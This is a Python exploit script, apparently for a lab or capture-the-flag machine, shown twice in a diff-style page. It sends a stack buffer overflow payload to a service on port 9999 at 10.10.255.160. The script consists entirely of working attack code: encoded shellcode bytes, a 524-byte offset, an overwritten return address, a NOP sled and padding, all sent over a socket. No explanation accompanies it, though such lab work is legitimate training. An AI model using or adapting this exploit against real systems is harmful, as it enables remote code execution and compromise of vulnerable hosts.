bensonmacharia · April 21, 2021 20:41
diff --git a/exploit.py b/exploit.py
 import socket
 from struct import pack

 # bad_chars = b"".join([pack("<B",x) for x in range(1,256)])
 IP = "10.10.255.160"
 PORT = 9999
 buf =  b""
 buf += b"\xdb\xd4\xba\x70\xb3\xd8\x55\xd9\x74\x24\xf4\x5b\x29"
 buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x23\xa0\x3a"
 buf += b"\xa0\x3f\x2e\x38\x4b\xbf\xaf\x5d\xc5\x5a\x9e\x5d\xb1"
 buf += b"\x2f\xb1\x6d\xb1\x7d\x3e\x05\x97\x95\xb5\x6b\x30\x9a"
 buf += b"\x7e\xc1\x66\x95\x7f\x7a\x5a\xb4\x03\x81\x8f\x16\x3d"
 buf += b"\x4a\xc2\x57\x7a\xb7\x2f\x05\xd3\xb3\x82\xb9\x50\x89"
 buf += b"\x1e\x32\x2a\x1f\x27\xa7\xfb\x1e\x06\x76\x77\x79\x88"
 buf += b"\x79\x54\xf1\x81\x61\xb9\x3c\x5b\x1a\x09\xca\x5a\xca"
 buf += b"\x43\x33\xf0\x33\x6c\xc6\x08\x74\x4b\x39\x7f\x8c\xaf"
 buf += b"\xc4\x78\x4b\xcd\x12\x0c\x4f\x75\xd0\xb6\xab\x87\x35"
 buf += b"\x20\x38\x8b\xf2\x26\x66\x88\x05\xea\x1d\xb4\x8e\x0d"
 buf += b"\xf1\x3c\xd4\x29\xd5\x65\x8e\x50\x4c\xc0\x61\x6c\x8e"
 buf += b"\xab\xde\xc8\xc5\x46\x0a\x61\x84\x0e\xff\x48\x36\xcf"
 buf += b"\x97\xdb\x45\xfd\x38\x70\xc1\x4d\xb0\x5e\x16\xb1\xeb"
 buf += b"\x27\x88\x4c\x14\x58\x81\x8a\x40\x08\xb9\x3b\xe9\xc3"
 buf += b"\x39\xc3\x3c\x43\x69\x6b\xef\x24\xd9\xcb\x5f\xcd\x33"
 buf += b"\xc4\x80\xed\x3c\x0e\xa9\x84\xc7\xd9\xdc\x5a\xee\xb8"
 buf += b"\x89\x58\xf0\xab\x15\xd4\x16\xa1\xb5\xb0\x81\x5e\x2f"
 buf += b"\x99\x59\xfe\xb0\x37\x24\xc0\x3b\xb4\xd9\x8f\xcb\xb1"
 buf += b"\xc9\x78\x3c\x8c\xb3\x2f\x43\x3a\xdb\xac\xd6\xa1\x1b"
 buf += b"\xba\xca\x7d\x4c\xeb\x3d\x74\x18\x01\x67\x2e\x3e\xd8"
 buf += b"\xf1\x09\xfa\x07\xc2\x94\x03\xc5\x7e\xb3\x13\x13\x7e"
 buf += b"\xff\x47\xcb\x29\xa9\x31\xad\x83\x1b\xeb\x67\x7f\xf2"
 buf += b"\x7b\xf1\xb3\xc5\xfd\xfe\x99\xb3\xe1\x4f\x74\x82\x1e"
 buf += b"\x7f\x10\x02\x67\x9d\x80\xed\xb2\x25\xb0\xa7\x9e\x0c"
 buf += b"\x59\x6e\x4b\x0d\x04\x91\xa6\x52\x31\x12\x42\x2b\xc6"
 buf += b"\x0a\x27\x2e\x82\x8c\xd4\x42\x9b\x78\xda\xf1\x9c\xa8"

 shellcode = buf

 s = socket.socket()
 s.connect((IP,PORT))
 s.recv(1024)

 total_length = 2072
 offset = 524
 nop_sled = b"\x90"*16
 new_eip = pack("<I",0x311712F3)
 buffer = [
    
    b"A" * offset,
    new_eip,
    nop_sled,
    shellcode,
    b"C" * (total_length-offset-len(shellcode)-len(nop_sled)-len(shellcode))
 ]

 buffer = b"".join(buffer)
 s.send(buffer)
	import socket
	from struct import pack

	# bad_chars = b"".join([pack("<B",x) for x in range(1,256)])
	IP = "10.10.255.160"
	PORT = 9999
	buf = b""
	buf += b"\xdb\xd4\xba\x70\xb3\xd8\x55\xd9\x74\x24\xf4\x5b\x29"
	buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x23\xa0\x3a"
	buf += b"\xa0\x3f\x2e\x38\x4b\xbf\xaf\x5d\xc5\x5a\x9e\x5d\xb1"
	buf += b"\x2f\xb1\x6d\xb1\x7d\x3e\x05\x97\x95\xb5\x6b\x30\x9a"
	buf += b"\x7e\xc1\x66\x95\x7f\x7a\x5a\xb4\x03\x81\x8f\x16\x3d"
	buf += b"\x4a\xc2\x57\x7a\xb7\x2f\x05\xd3\xb3\x82\xb9\x50\x89"
	buf += b"\x1e\x32\x2a\x1f\x27\xa7\xfb\x1e\x06\x76\x77\x79\x88"
	buf += b"\x79\x54\xf1\x81\x61\xb9\x3c\x5b\x1a\x09\xca\x5a\xca"
	buf += b"\x43\x33\xf0\x33\x6c\xc6\x08\x74\x4b\x39\x7f\x8c\xaf"
	buf += b"\xc4\x78\x4b\xcd\x12\x0c\x4f\x75\xd0\xb6\xab\x87\x35"
	buf += b"\x20\x38\x8b\xf2\x26\x66\x88\x05\xea\x1d\xb4\x8e\x0d"
	buf += b"\xf1\x3c\xd4\x29\xd5\x65\x8e\x50\x4c\xc0\x61\x6c\x8e"
	buf += b"\xab\xde\xc8\xc5\x46\x0a\x61\x84\x0e\xff\x48\x36\xcf"
	buf += b"\x97\xdb\x45\xfd\x38\x70\xc1\x4d\xb0\x5e\x16\xb1\xeb"
	buf += b"\x27\x88\x4c\x14\x58\x81\x8a\x40\x08\xb9\x3b\xe9\xc3"
	buf += b"\x39\xc3\x3c\x43\x69\x6b\xef\x24\xd9\xcb\x5f\xcd\x33"
	buf += b"\xc4\x80\xed\x3c\x0e\xa9\x84\xc7\xd9\xdc\x5a\xee\xb8"
	buf += b"\x89\x58\xf0\xab\x15\xd4\x16\xa1\xb5\xb0\x81\x5e\x2f"
	buf += b"\x99\x59\xfe\xb0\x37\x24\xc0\x3b\xb4\xd9\x8f\xcb\xb1"
	buf += b"\xc9\x78\x3c\x8c\xb3\x2f\x43\x3a\xdb\xac\xd6\xa1\x1b"
	buf += b"\xba\xca\x7d\x4c\xeb\x3d\x74\x18\x01\x67\x2e\x3e\xd8"
	buf += b"\xf1\x09\xfa\x07\xc2\x94\x03\xc5\x7e\xb3\x13\x13\x7e"
	buf += b"\xff\x47\xcb\x29\xa9\x31\xad\x83\x1b\xeb\x67\x7f\xf2"
	buf += b"\x7b\xf1\xb3\xc5\xfd\xfe\x99\xb3\xe1\x4f\x74\x82\x1e"
	buf += b"\x7f\x10\x02\x67\x9d\x80\xed\xb2\x25\xb0\xa7\x9e\x0c"
	buf += b"\x59\x6e\x4b\x0d\x04\x91\xa6\x52\x31\x12\x42\x2b\xc6"
	buf += b"\x0a\x27\x2e\x82\x8c\xd4\x42\x9b\x78\xda\xf1\x9c\xa8"

	shellcode = buf

	s = socket.socket()
	s.connect((IP,PORT))
	s.recv(1024)

	total_length = 2072
	offset = 524
	nop_sled = b"\x90"*16
	new_eip = pack("<I",0x311712F3)
	buffer = [

	b"A" * offset,
	new_eip,
	nop_sled,
	shellcode,
	b"C" * (total_length-offset-len(shellcode)-len(nop_sled)-len(shellcode))
	]

	buffer = b"".join(buffer)
	s.send(buffer)